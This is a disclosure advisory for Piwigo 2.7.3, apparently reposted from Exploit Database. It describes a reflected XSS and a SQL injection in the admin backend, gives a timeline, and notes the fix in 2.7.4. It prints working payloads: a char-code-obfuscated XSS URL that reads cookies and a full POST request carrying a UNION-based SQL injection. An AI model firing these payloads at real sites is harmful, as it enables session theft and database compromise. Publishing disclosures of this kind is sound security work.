Piwigo 2.7.3 – Multiple Vulnerabilities

• Exploit Database
• 19 阅读

• 作者： Steffen Rösemann
  日期： 2015-02-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36127/

• Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <=
  v. 2.7.3
  Advisory ID: SROEADV-2015-06
  Author: Steffen Rösemann
  Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015)
  Vendor URL: http://piwigo.org
  Vendor Status: patched
  CVE-ID: -
  
  ==========================
  Vulnerability Description:
  ==========================
  
  Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its
  administrative backend.
  
  ==================
  Technical Details:
  ==================
  
  The reflecting XSS vulnerability resides in the "page" parameter used in
  the file admin.php which can be found in the administrative backend located
  here in a common Piwigo installation:
  
  http://{TARGET}/admin.php?page=plugin-AdminTools
  
  Exploit-Example:
  
  http://
  {TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E
  
  The SQL injection vulnerability can as well be found in the administrative
  backend and can be found in the "History" functionality located here:
  
  http://{TARGET}/admin.php?page=history
  
  The SQL injection vulnerability can be exploited by appending arbitrary SQL
  statements in a POST request to the parameter "user":
  
  Exploit-Example:
  
  POST /piwigo/admin.php?page=history HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101
  Firefox/31.0 Iceweasel/31.3.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/piwigo/admin.php?page=history&search_id=82
  Cookie: pwg_display_thumbnail=no_display_thumbnail;
  pwg_id=19rpao6bhdsn3l0u0o1im4m680;
  _pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532.
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 255
  
  start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2)
  AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 --
  &image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit
  
  =========
  Solution:
  =========
  
  Install the latest version 2.7.4 (released 17th February 2015).
  
  
  ====================
  Disclosure Timeline:
  ====================
  08-Jan-2015 – found the vulnerability
  09-Jan-2015 - informed the developers
  09-Jan-2015 – release date of this security advisory [without technical
  details]
  09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4)
  17-Feb-2015 - vendor releases patch 2.7.4 (see [3])
  17-Feb-2015 - release date of this security advisory
  17-Feb-2015 - send to FullDisclosure
  
  ========
  Credits:
  ========
  
  Vulnerability found and advisory written by Steffen Rösemann.
  
  ===========
  References:
  ===========
  
  [1] http://piwigo.org
  [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html
  [3] http://piwigo.org/forum/viewtopic.php?id=25179